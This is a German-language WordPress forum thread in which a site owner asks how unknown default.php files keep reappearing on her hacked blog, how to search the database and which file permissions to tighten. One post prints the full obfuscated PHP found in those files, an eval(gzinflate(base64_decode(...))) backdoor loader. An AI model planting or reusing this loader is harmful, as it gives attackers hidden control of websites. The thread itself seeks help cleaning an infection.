Danke, habe ich mir gedacht, wenn ich die default.php lösche, sind diese flugs wieder da. Stelle ich den CHMOD auf 404 bleiben sie leer. Mich würde interessieren, wie die reinkommen. Neu installiert, das selbe Spiel!
Beiträge von Lisa4www
-
-
Sehr geehrte Wordpress Expeten,
ist das ein Schadcode, ist in default.php Dateien, die ich nicht angelegt habe.
Ich habe Decoder versucht ohne Erfolg. Offline gescannt, kein Ergebnis.
FTP Log Dateien kein Hinweis auf fremde Zugriffe:
Wenn es aus der DB kommen würde, wie durchsucht man diese? wo nach?
Auf das tmp verzeichnis beim Hoster habe ich keinen Zugriff!<?php eval(gzinflate(base64_decode("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"))); ?>
Besten Dank für Hinweise
Lisa -
Luft anhalten, finde ich nicht sehr höflich, trotzdem vielen Dank!
Nehmen wir an der Rechner ist sauber.
Meine Fragen sind trotz der Ausführungen offen:
Frage: die DB durchsuchen, nach ..........? eval?
Die Dateirechte in der Standardinstallation, was kann man alles auf 444 setzen?
(htaccess, wp-config, klar! wp-content umbenannt, usw.)Was ich noch immer nicht verstehe, auch aus den Log Dateien nicht ersichtlich,
wie werden Dateien verändert, neue Dateien (zB.: default.php) erstellt,
Witz der Sache keine fremden FTP Zugriffe.Logisch wäre über Plugins? Ununterbrochen scannen? mit anderen Plugin?
Mit freundlichen Grüßen
LisaP.S.: Wenn, wer behauptet, er kennt alle Methoden, ist er ein "Wunderkind"!
-
Danke vielmals, entschuldige ich habe vergessen unter FTP Logs anzumerken, dass auch der PC gescannt werden soll.
Exploit-Seiten Links Danke, zum Antivirus Plugin:
Jeder Wordpress Spezialist empfiehlt Update, Update nur neue Versionen oder?
Versionsverlauf
Version 1.3.1 vom 12.6.2012
- Kompatibilität zu WordPress 3.4
- Systemanforderungen: Von PHP 5.0 auf PHP 5.1
- HiDPI-Icon für Retina-Displays
- Entfernung des Icons aus der Sidebar
Ich hoffe, ich kriege auch noch Antworten auf meine anderen Fragen,
bitte um Entschuldigung, wenn ich mich nicht voll verständlich gemacht habe.
Grüße
Lisa -
Liebe WP FreundIn,
in Firefox 18.0 wird diese Seite als attackierend angezeigt, in anderen Browsern nicht.
? Warum ?
OK, Schadware gefunden, iframes, veränderte htaccess, zusätzliche default.php
Selbst wenn man alle Dateien durchforstet, mit welchen Methoden auch immer,
ist ein "Clean" fast unmöglich. Trotz aller Scanner, die angeboten werden.
Logische Schritt: DB sichern, möchte nicht alle Beiträge verlieren.
Alles löschen, neu installieren unter Beachtung höchstmöglicher Sicherheit
(kenne fast alle Möglichkeite!)
vorübergehend eine Baustellen html Datei. In den Webmastertools eine
Überprüfung beantragen, Firefox?
Frage: die DB durchsuchen, nach ..........? eval?
Die Dateirechte in der Standardinstallation, was kann man alles auf 444 setzen?
(htaccess, wp-config, klar! wp-content umbenant, usw.)
Wenn ich nicht "hosten" würde, stünde auch die Frage, wie schotte ich in der
Serverkonfiguratin PHP usw. ab?
Was ich noch immer nicht verstehe, auch aus den Log Dateien nicht ersichtlich,
wie werden Dateien verändert, neue Dateien (zB.: default.php) erstellt,
Witz der Sache keine fremden FTP Zugriffe.
Logisch wäre über Plugins? Ununterbrochen scannen? mit anderen Plugin?Fazit: WP toll - keine Frage, Sicherheits-Tipps könnten ausführlicher sein!
Anfänger sind ziemlich verloren, Easy Install oder aus dem CPanel zaubern
unsicheres WP hervor, ja schnell!
Beispiel: Fast nirgendwo zu finden, welche Plugins sind gefährlich -
Sehr geehrte Damen und Herren,
wo poste ich Fragen, Bemerkungen über ein mit Malware verseuchtes Blog.
WP 3.5 ?
Besten Dank
Lisa